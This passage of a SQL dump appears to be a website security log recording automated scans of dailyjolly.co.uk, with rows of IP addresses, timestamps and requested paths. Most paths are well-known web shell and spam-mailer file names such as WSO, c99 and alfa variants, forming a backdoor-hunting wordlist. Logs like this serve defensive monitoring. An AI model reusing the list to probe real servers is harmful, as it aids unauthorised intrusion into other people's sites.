146.228',3638727396,'',0,1674412807.9957,100,'0t4ER1687MNHwUJTL5uBIkYc','','13|0|0|0|dailyjolly.co.uk/y.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412817.2735,100,'AIl9GxXBgt6hsc8Pk4ajJTpd','','13|0|0|0|dailyjolly.co.uk/u.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412824.6791,100,'sHAxSlCt9OBaQNEmgRPkLDUp','','13|0|0|0|dailyjolly.co.uk/i.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412831.8122,100,'RTVyOUoI9w3pL64E0HQPhWrC','','13|0|0|0|dailyjolly.co.uk/p.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412839.5007,100,'bRi3dzePTEXl0kZD19I5wAFu','','13|0|0|0|dailyjolly.co.uk/q.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412845.7098,100,'SD4E9CJx3lMq8I7BjrPNiybX','','13|0|0|0|dailyjolly.co.uk/s.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412850.7471,100,'DR1t0ahr698GSHVjOyLwFqM3','','13|0|0|0|dailyjolly.co.uk/d.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412861.4502,100,'TZtYpvn7ULWl89wIRXAcbgFa','','13|0|0|0|dailyjolly.co.uk/h.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412867.2790,100,'qNsSzhG1lZUEgyOxurwoVBbQ','','13|0|0|0|dailyjolly.co.uk/j.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412872.1384,100,'IsyeSJ9Wxd83ztq6ni2hQ7bE','','13|0|0|0|dailyjolly.co.uk/k.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412878.6986,100,'5LEyremCF0dwtfhxgU6Nl3i8','','13|0|0|0|dailyjolly.co.uk/l.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412882.8488,100,'P4wS1GLVcZsx2zid6j0pnoh9','','13|0|0|0|dailyjolly.co.uk/n.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412891.4271,100,'rvpo8G2sanYgmeUtPd5wEhAK','','13|0|0|0|dailyjolly.co.uk/xindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412901.3152,100,'1HkehmAnpdWfSVqvI4zCTKO5','','13|0|0|0|dailyjolly.co.uk/kindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412911.7652,100,'J7wbHF5mZp3DqBQl08hEVRcX','','13|0|0|0|dailyjolly.co.uk/FoxWSOv1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412919.7397,100,'qzA3SKUX87uRvsDlWpnBikZr','','13|0|0|0|dailyjolly.co.uk/alf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412928.7637,100,'Mw3AQNoj6czUx9JtKfyHSERp','','13|0|0|0|dailyjolly.co.uk/bb.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412934.4079,100,'BU7pOjThIXFZni4S9K3qdgJa','','13|0|0|0|dailyjolly.co.uk/lf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412941.8653,100,'a5ZWi8UITgQl6ShxMnkH7jsz','','13|0|0|0|dailyjolly.co.uk/WSO.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412947.1057,100,'3lv87GkPCupVJHwxUtEdgqWa','','13|0|0|0|dailyjolly.co.uk/xxx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412954.2182,100,'OSULYEyGWRQulBfsAaMNci0h','','13|0|0|0|dailyjolly.co.uk/hello.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412961.8004,100,'PhVLXlIow0aepAurjfvyUE3b','','13|0|0|0|dailyjolly.co.uk/ok.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412967.0645,100,'3Ci15QGV0Yy8vwulfPpex7qS','','13|0|0|0|dailyjolly.co.uk/if.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412971.2202,100,'xAvGy3rhqML9K2JtsPbkZ8Xw','','13|0|0|0|dailyjolly.co.uk/kk.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412980.3694,100,'Jiy0vbOrEkxGolTSgXf2QdP1','','13|0|0|0|dailyjolly.co.uk/mrjn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412988.2749,100,'cdt8YsmXpUvNAPnIg3woKlZz','','13|0|0|0|dailyjolly.co.uk/kn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412991.8944,100,'CkR8oeNfMtA6OHmyYr4IVaFW','','13|0|0|0|dailyjolly.co.uk/3301.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412996.4375,100,'J5hx1vRYZB6USHMdmk8X9feL','','13|0|0|0|dailyjolly.co.uk/leaf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413007.4870,100,'1ZrHmDRhMln7vjaXbNdzxLQu','','13|0|0|0|dailyjolly.co.uk/alex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413016.6990,100,'OwZmHd9IiS0Ea6Msh4ygYoNG','','13|0|0|0|dailyjolly.co.uk/mailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413026.5242,100,'gDuG7vqHACZXorTRPNhFJS6y','','13|0|0|0|dailyjolly.co.uk/anone.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413033.1992,100,'pSC4UvVm3QFq8h2RZYTwjEak','','13|0|0|0|dailyjolly.co.uk/wp-configer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413036.5623,100,'vSlb80R3w9Bnik4NZjGfLs7H','','13|0|0|0|dailyjolly.co.uk/wp-ad.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413042.1173,100,'0NOD7QlPWxd5hi3tsaEUfbZB','','13|0|0|0|dailyjolly.co.uk/send.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413047.6873,100,'S0bz9yiRdpolTrYKJh4NwMf1','','13|0|0|0|dailyjolly.co.uk/3.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413053.3160,100,'OL6Uwo9inrcRmMzEjqftdVJB','','13|0|0|0|dailyjolly.co.uk/.wp-cache.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413060.8826,100,'2Z1JwB39LzaghqmvHXidj0Ms','','13|0|0|0|dailyjolly.co.uk/sendmail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413067.1827,100,'a6ky3GQMNueAP2ph40V9C8zF','','13|0|0|0|dailyjolly.co.uk/rahma.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413072.2250,100,'9QDWRsTNJ5PbGa2eUHkOSzum','','13|0|0|0|dailyjolly.co.uk/nasgor.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413079.9379,100,'fLlVd9kx50pP1nhAc8sbGgFq','','13|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413085.9551,100,'1xPOG87QJBHWqy0uNSm3oYbn','','13|0|0|0|dailyjolly.co.uk/alfa123.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413095.2675,100,'y0WnI2mKarg7J14QBFi3v8Dq','','13|0|0|0|dailyjolly.co.uk/upload.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413099.3309,100,'ZWl8YtJsdSj6UwAf9cnvCeir','','13|0|0|0|dailyjolly.co.uk/bypass.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413107.4047,100,'q7r29OChRoZaXJ1F6cfe3V0S','','13|0|0|0|dailyjolly.co.uk/wp-one.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413115.3695,100,'FRCH5EzxUqTPhXjfwb3NDc24','','13|0|0|0|dailyjolly.co.uk/alexus.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413122.7728,100,'KkGJelwFP86cYqtfCimpB15M','','13|0|0|0|dailyjolly.co.uk/wso1337.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413129.0608,100,'R4IVb6Lmh1a2olJGfwys7rvx','','13|0|0|0|dailyjolly.co.uk/1337.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413135.3253,100,'BMKUYjdRZH7eifml5T2rQ3wP','','13|0|0|0|dailyjolly.co.uk/blog.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413144.3829,100,'Ph2oe0byiLH9aFtOdkcVRqYz','','13|0|0|0|dailyjolly.co.uk/it.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413150.4605,100,'OkYH7Q6rSU92bRaDfy4Cxs0l','','13|0|0|0|dailyjolly.co.uk/kiss.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413155.0295,100,'c7ZnqDIHXURWieB4vNpmSOzA','','13|0|0|0|dailyjolly.co.uk/0.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413164.9834,100,'PUknGE6aSzqXFi412thRgv7j','','13|0|0|0|dailyjolly.co.uk/wp2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413168.9861,100,'BOGtxwJ4Dkfy3hd1XPM70HUF','','13|0|0|0|dailyjolly.co.uk/owl.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413177.1340,100,'ArbtUndiXg8lcfZLoIRxuVBw','','13|0|0|0|dailyjolly.co.uk/vuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413186.3688,100,'xCOfj0ISWPHqy3R2FVohT4lc','','13|0|0|0|dailyjolly.co.uk/ohayo.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413191.8623,100,'ae0pAZ6OKqXPYz4VhDkbFRvj','','13|0|0|0|dailyjolly.co.uk/wp-admin.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413200.8034,100,'MpKrGevV4RZY8SAb7CsglyTP','','13|0|0|0|dailyjolly.co.uk/cms.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413204.9968,100,'nyzEm4Q1KkhbpJlUBOId9ugx','','13|0|0|0|dailyjolly.co.uk/wp-uploads.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413209.5984,100,'tDENv2KlCaxIY7MjHJZ3q9dr','','13|0|0|0|dailyjolly.co.uk/Gel.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413215.8572,100,'bl3AqZnykPuWCxeYX5hmULzB','','13|0|0|0|dailyjolly.co.uk/41.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413220.3602,100,'tTK15laNmekrc3jqdyL8DJEW','','13|0|0|0|dailyjolly.co.uk/4price.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413226.8796,100,'wu12NrSF3ZJRthyzipm4c7gk','','13|0|0|0|dailyjolly.co.uk/MARIJUANA.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413233.3909,100,'iwquatcXUZCdo8LIe3Ag7jNs','','13|0|0|0|dailyjolly.co.uk/.fk.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413239.7838,100,'FzkApQUXt6V92ExCGjNSioa4','','13|0|0|0|dailyjolly.co.uk/XxX.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413245.2032,100,'ksJvAragxz8f50UejiPdoMpq','','13|0|0|0|dailyjolly.co.uk/alexuse.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413249.9634,100,'02bhxjs6iavAXyNV8ECZo4lg','','13|0|0|0|dailyjolly.co.uk/Sendemail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413259.6394,100,'E6UzCaBdsXhDmJKgZFoNVbwk','','13|0|0|0|dailyjolly.co.uk/content.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413267.1549,100,'EbvKZ6RsemLP974F5upI20cX','','13|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413273.0585,100,'XV2Fcwt8DAOnG04evfqLQsrj','','13|0|0|0|dailyjolly.co.uk/olu.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413279.1753,100,'FeO6GXo7cTyBLPr8t0AWaxM5','','13|0|0|0|dailyjolly.co.uk/alexusmailer%202.0.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413284.1602,100,'4yGCdYclPpAVZEaxSXjqgzn7','','13|0|0|0|dailyjolly.co.uk/rss.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413287.8374,100,'NvQR1gmMYhrJ9DfGpEwqIxiH','','13|0|0|0|dailyjolly.co.uk/alexus-mailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413295.4989,100,'F6aDrEp3dNTYMiQJVecWA2lv','','13|0|0|0|dailyjolly.co.uk/wp-file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413302.1726,100,'VD3pE8LgnKu5FWo2NcyfzXqJ','','13|0|0|0|dailyjolly.co.uk/wso2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413310.5035,100,'zdmpjk1ghFvOZq5S7QYRswxL','','13|0|0|0|dailyjolly.co.uk/wso1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413316.2745,100,'Nr1EWR0pgDj5sTuz9aXnZl36','','13|0|0|0|dailyjolly.co.uk/olux.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413323.4079,100,'oceABdfhIs5rqv7N0XtzSRWH','','13|0|0|0|dailyjolly.co.uk/wp-info.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413329.9797,100,'SwlaYKmr70xLQPtnDCG4RUu3','','13|0|0|0|dailyjolly.co.uk/xl.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413338.3347,100,'ONsWq2izPJy1GSvKdZbkRljY','','13|0|0|0|dailyjolly.co.uk/wp-confiig.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413343.9857,100,'X4TC1kuDbeHnQWZ8ESriq5MV','','13|0|0|0|dailyjolly.co.uk/file-manager.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413351.4818,100,'CkTK0sUZaolYy9WXfrSQm6R2','','13|0|0|0|dailyjolly.co.uk/uploader.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413357.8237,100,'KdaGQ9uij5cHyMbP74EDertA','','13|0|0|0|dailyjolly.co.uk/leafmailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674413364.3411,100,'xwzEUWHMKgadBGnslA5qpFc4','','13|0|0|0|dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413370.6392,100,'KM2Y5PhnQLX8E7Wx0Idvpwak','','13|0|0|0|dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413381.7496,100,'08lguVy9bQTPSnjUfdH4YmN7','','13|0|0|0|dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413386.2708,100,'7QvNYOCLIoF3KTu2qMVD1eaZ','','13|0|0|0|dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413392.9476,100,'E5nPzrKi2sTUv83AHCytc6Lp','','13|0|0|0|dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413396.5969,100,'KnJ2PDe0kLMR7STsFaEOq4c3','','13|0|0|0|dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413402.4839,100,'JjiarFK1X4UOhfEeDv8TW3AR','','13|0|0|0|dailyjolly.co.uk/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413407.5149,100,'d3QrkOUzqW7ui0wJnG6BSbF2','','13|0|0|0|dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413414.8562,100,'HjRazN9lL2TtYZEeCMyP5kVO','','13|0|0|0|dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413419.1804,100,'8uYHRPcCwlTnhFvG7jSdoUaK','','13|0|0|0|dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413425.2281,100,'biVWFUPzkN587SlrOhTjDsAo','','13|0|0|0|dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22',0,13,0),('216.226.146.228',3638727396,'',0,1674413434.5000,100,'IdTf70QbR9BXwuDs4EvnYOAt','','13|0|0|0|dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413440.4101,100,'y5iG6gmFMCx3zf8tohBuHT9Z','','13|0|0|0|dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674413449.6705,100,'IFSXP1ZyvL7wdVglr3z6sbC5','','13|0|0|0|dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('167.172.248.229',2813130981,'',0,1674417643.7239,55,'872LoSy6xbe9qksFZahmMdiz','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417649.2176,55,'qlmx23iaj5pwuhgGyRWQ4YtP','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/hpNlC.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417654.1835,55,'GIULCBxrYVm0ifD6QldMK57X','','19|0|0|0|www.dailyjolly.co.uk/cyz.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417654.2015,55,'Jpmq1rgQe4aznAPNVBvGj56Z','','19|0|0|0|www.dailyjolly.co.uk/HGlsX.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417654.2179,55,'5osyeruKnOaT84cJflUkbVF0','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/S7UfQilj.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417654.2587,10,'5osyeruKnOaT84cJflUkbVF0','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/S7UfQilj.php',0,707,0),('167.172.248.229',2813130981,'',0,1674417664.6308,55,'4Crb1aTkldE8BgHPO7YiyoXn','','19|0|0|0|www.dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/hpNlC.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417670.0744,100,'K6s10Hj5GV4ehFDcAx3aigm8','','13|0|0|0|www.dailyjolly.co.uk/cyz.php',0,13,0),('167.172.248.229',2813130981,'',0,1674417670.9983,55,'1Em23Zeyhz794PfQNSuAp8UI','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/hpNlC.php',0,19,0),('167.172.248.229',2813130981,'',0,1674417676.7563,100,'5jsy1QxLGqV8cn3gh2bvJRYd','','13|0|0|0|www.dailyjolly.co.uk/cyz.php',0,13,0),('20.244.36.78',351544398,'',0,1674426450.0163,55,'hM48vZ7Tqt3NYlyURJWAepBm','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.244.36.78',351544398,'',0,1674426450.8909,55,'tvFMuYejTrgPws4NDmoX13Hk','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('20.244.36.78',351544398,'',0,1674426451.7673,55,'mvQB3efAUZ5wlFitzJNKpWE6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1674426452.7661,55,'xKPedHZlSz9VoTp8uj1IaE6R','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('20.244.36.78',351544398,'',0,1674426453.9095,55,'YXUB7FtNLCcxOm4beTp9q56R','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('20.244.36.78',351544398,'',0,1674426454.0073,10,'YXUB7FtNLCcxOm4beTp9q56R','','707|0|0|0|www.dailyjolly.co.uk/sym403.php',0,707,0),('20.244.36.78',351544398,'',0,1674426454.8531,55,'gBHmwOeL47yMa8CpNzbDFXd0','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('20.244.36.78',351544398,'',0,1674426455.7542,55,'I1ZGWiTMBhaNwC3cH4EQs8zu','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('20.244.36.78',351544398,'',0,1674426456.6348,55,'Gd2RTgX5AuLD9r6HM03ji1oK','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1674426457.5029,55,'lZomswViJextR712dpvbHTEB','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1674426458.3588,55,'tyou3gUrDq9bdQWzvLOV28YB','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('20.244.36.78',351544398,'',0,1674426459.2566,55,'pZ3N7VJsxBq5uAkUvnrMChzb','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1674426460.1531,55,'LnxzDZ4BgvetYcfpWoRGVmUh','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1674426461.0322,55,'AO6tVpKB5QE2lyRZSjgov1hc','','19|0|0|0|www.dailyjolly.co.uk/xxx.php',0,19,0),('20.244.36.78',351544398,'',0,1674426461.9237,55,'VrWF6wlm01zjNptDX8nfY93P','','19|0|0|0|www.dailyjolly.co.uk/ok.php',0,19,0),('20.244.36.78',351544398,'',0,1674426462.7931,55,'o1mjEe7WbwHXhn6Nx5taskc0','','19|0|0|0|www.dailyjolly.co.uk/0.php',0,19,0),('20.244.36.78',351544398,'',0,1674426463.6919,55,'Mwa9m1O7YQLfcqnvKAE04Pys','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1674426464.6026,55,'XmON3KpPJxkMnFqtgQWa6edG','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1674426465.4779,55,'trlLe6FOi7yASVYjmE5Ka24N','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.244.36.78',351544398,'',0,1674426466.4129,55,'HRqGhlLp9aP1Y4eIfvcUXDAE','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.244.36.78',351544398,'',0,1674426467.2797,55,'H7FC9GwLKxoiY1vVfzndj6cl','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.244.36.78',351544398,'',0,1674426468.1815,55,'ziOlQoaZnhTsbr1vDMeBtU3A','','19|0|0|0|www.dailyjolly.co.uk/4.php',0,19,0),('20.244.36.78',351544398,'',0,1674426469.0490,55,'IByDYWGVSauQZAw79rvK2nLj','','19|0|0|0|www.dailyjolly.co.uk/5.php',0,19,0),('20.244.36.78',351544398,'',0,1674426469.9170,55,'r6e8GSAT45vcojWZ3iQpwsn2','','19|0|0|0|www.dailyjolly.co.uk/6.php',0,19,0),('20.244.36.78',351544398,'',0,1674426470.7941,55,'BcusgIOdzCWnNZ658re7UPkQ','','19|0|0|0|www.dailyjolly.co.uk/7.php',0,19,0),('20.244.36.78',351544398,'',0,1674426471.6792,55,'miGJsDcF4YhE3H7xN9f2d0Qy','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('20.244.36.78',351544398,'',0,1674426472.5783,55,'89051okM4WblryvDViG3ZBnU','','19|0|0|0|www.dailyjolly.co.uk/9.php',0,19,0),('20.244.36.78',351544398,'',0,1674426473.4567,55,'bFludUqCLkr4aVfs7WDtjcP8','','19|0|0|0|www.dailyjolly.co.uk/10.php',0,19,0),('20.244.36.78',351544398,'',0,1674426474.3715,55,'jcYyKDxSlVIN8gtMPFnTerEb','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.244.36.78',351544398,'',0,1674426475.2786,55,'w6R8bN0P4eGByvlWphZMJqEs','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('20.244.36.78',351544398,'',0,1674426476.1581,55,'TFfxWQrAUnNtvlKzL9p8D13R','','19|0|0|0|www.dailyjolly.co.uk/e.php',0,19,0),('20.244.36.78',351544398,'',0,1674426477.0497,55,'ZlkjabeWXyLfQ26AU4ntM9Dg','','19|0|0|0|www.dailyjolly.co.uk/r.php',0,19,0),('20.244.36.78',351544398,'',0,1674426477.9281,55,'uL71qv5MCmoc6B2PHVWSGnaf','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.244.36.78',351544398,'',0,1674426478.7829,55,'SJHo71UXq8YxNyBzlwsjCgI5','','19|0|0|0|www.dailyjolly.co.uk/y.php',0,19,0),('20.244.36.78',351544398,'',0,1674426479.6442,55,'R7V8Z4tJy2heOUipj0LWFK6o','','19|0|0|0|www.dailyjolly.co.uk/u.php',0,19,0),('20.244.36.78',351544398,'',0,1674426480.5496,55,'x6LyFNkdelRTsDICE20J3WMo','','19|0|0|0|www.dailyjolly.co.uk/i.php',0,19,0),('20.244.36.78',351544398,'',0,1674426481.5356,55,'IukQHc95d2rxlM7WnK1iOXf6','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.244.36.78',351544398,'',0,1674426482.4123,55,'nCqeDuaRKjJ6z57UMXoZBfN2','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.244.36.78',351544398,'',0,1674426483.2856,55,'kp4oDHUSdEmcWGq78nQM20we','','19|0|0|0|www.dailyjolly.co.uk/q.php',0,19,0),('20.244.36.78',351544398,'',0,1674426484.1476,55,'X2Jfwu8mNkW7rzA1xIiS3TlZ','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('20.244.36.78',351544398,'',0,1674426485.0964,55,'tsbZEvixRK1Ncu0FaeYSTP5k','','19|0|0|0|www.dailyjolly.co.uk/d.php',0,19,0),('20.244.36.78',351544398,'',0,1674426485.9636,55,'a9nYjwLomzkMbQ3ChDO25i1d','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('20.244.36.78',351544398,'',0,1674426486.8945,55,'OVC7eIdENjza2tnyq5BFKoA8','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('20.244.36.78',351544398,'',0,1674426487.7967,55,'ISe4gyV3t5quXGNDdoLk1Fns','','19|0|0|0|www.dailyjolly.co.uk/h.php',0,19,0),('20.244.36.78',351544398,'',0,1674426488.7259,55,'2ZLpfYwex6uMjP395RNzlgVI','','19|0|0|0|www.dailyjolly.co.uk/j.php',0,19,0),('20.244.36.78',351544398,'',0,1674426489.6641,55,'GJPYDcb6fAKWmz0rVFkCtwng','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.244.36.78',351544398,'',0,1674426490.5373,55,'NkyeYlQDvOdmF0nxRfagL5hj','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('20.244.36.78',351544398,'',0,1674426491.3845,55,'WC5n0ZBfTy4Uo8DjkLcOQ9zm','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1674426492.2478,55,'VX6iymJrKgvSY4bTDHBUcLF3','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.244.36.78',351544398,'',0,1674426493.1066,55,'VUSCtJ1spclXam4AGHBgT2LZ','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('20.244.36.78',351544398,'',0,1674426493.9769,55,'Ant6M0iHEUY3N54mcxObTfKd','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('20.244.36.78',351544398,'',0,1674426494.8833,55,'3rQuZC0JhlzKOUn51w8XE2Ya','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.244.36.78',351544398,'',0,1674426495.8257,55,'4xc8IoVeTa6hJL7su31BpKzr','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.244.36.78',351544398,'',0,1674426496.7055,55,'eVCKMN07rvYtGTnE1pQLBo3i','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('20.244.36.78',351544398,'',0,1674426497.5996,55,'AnUpcuCZSmXLW8yNzDvOFxPa','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1674426498.4601,55,'ldakWF8VpvCjbztXoOENLIrJ','','19|0|0|0|www.dailyjolly.co.uk/minimo.php',0,19,0),('20.244.36.78',351544398,'',0,1674426499.3153,55,'EYdMtUnZqvh5XlrIF1iRHT7j','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('20.244.36.78',351544398,'',0,1674426500.2218,55,'1KrO0gMTuAfQCDZm7W8EP9qc','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('20.244.36.78',351544398,'',0,1674426501.0846,55,'IOxsw4t1EZP2TXjHRfnvY0Lg','','19|0|0|0|www.dailyjolly.co.uk/www.php',0,19,0),('20.244.36.78',351544398,'',0,1674426501.9468,55,'j049nxu5LOq3UalRgeNAiWJz','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('20.244.36.78',351544398,'',0,1674426502.8517,55,'iIapMzvPLuKDSFQrH1lsnYGx','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('20.244.36.78',351544398,'',0,1674426503.7527,55,'AGo0ysqj34JTweEbaznlRLFZ','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674426504.6154,55,'AwKFderPNlDGspiS1c5BjTqg','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('20.244.36.78',351544398,'',0,1674426505.4845,55,'x2ghfQkDWo5iUAqTFpBerLS8','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1674426506.4144,55,'1SgRTvHN